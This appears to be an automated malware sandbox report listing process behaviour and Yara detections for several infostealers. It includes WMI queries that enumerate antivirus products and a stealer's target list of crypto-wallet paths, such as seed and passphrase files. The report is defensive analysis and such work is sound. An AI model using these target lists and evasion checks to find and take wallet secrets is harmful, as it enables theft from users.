Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Queries volume information: C:\Users\user\Pictures\Lighter Tech\runtime.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Queries volume information: C:\Users\user\Pictures\Lighter Tech\runtime.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 14_2_004079E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

14_2_004079E4

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_0047B010 GetUserNameA,

19_2_0047B010

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_004B2307 _free,_free,_free,GetTimeZoneInformation,_free,

19_2_004B2307

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_00477C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

19_2_00477C40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: crypted.exe, 00000009.00000002.1958203067.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000028.00000002.2619416790.00000000015A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: axplong.exe, 00000007.00000002.2766434406.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000009.00000002.1958203067.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000028.00000002.2619416790.00000000015A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: RegAsm.exe, 0000000B.00000002.2107909392.00000000013E2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2119759552.000000000669E000.00000004.00000020.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2176087599.0000000006413000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3096433679.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2752413247.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: rHCHrI9F0v.exe, 00000011.00000002.2176087599.0000000006413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CF46}windowsdefender://%ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 20.2.Hkbsse.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.1cde0324.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hkbsse.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.1cde0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.Hkbsse.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.axplong.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nework.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.1cde0324.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.1261f87c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.AppLaunch.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hkbsse.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.1261f558.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Nework.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.1261f87c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.1261f558.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.runtime.exe.125a1b20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2560282937.000000001CDE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2028680920.0000000000471000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2038154443.0000000000621000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1914720636.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.2035548380.0000000000621000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1500851216.0000000000801000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1529134155.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1460552733.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2745835536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1484616344.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2041814507.0000000000621000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2746002669.0000000000621000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2518264534.00000000125A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe, type: DROPPED

Yara detected CryptOne packer

Source: Yara match

File source: 00000018.00000002.2259797317.0000000003029000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 5416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: channel3.exe PID: 5192, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 37.2.BitLockerToGo.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2732580728.00000000014EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2612049284.000000000196C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2578867327.0000000000591000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 15.0.CZjRdKVnFB.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.build.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2003484391.0000000000A12000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.2385848983.0000000000BE2000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2004782582.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.crypted.exe.3f75570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.436060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.436060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.crypted.exe.41a5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.crypted.exe.3f75570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.rHCHrI9F0v.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2004024984.00000000004A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2106632894.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1959861483.0000000003F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2703663881.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2745709445.0000000000420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 4216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CZjRdKVnFB.exe PID: 4536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rHCHrI9F0v.exe PID: 1012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4928, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7068, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 15.0.CZjRdKVnFB.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.build.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\walletsLR
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003497000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000016.00000002.2262384371.0000000000A0C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR
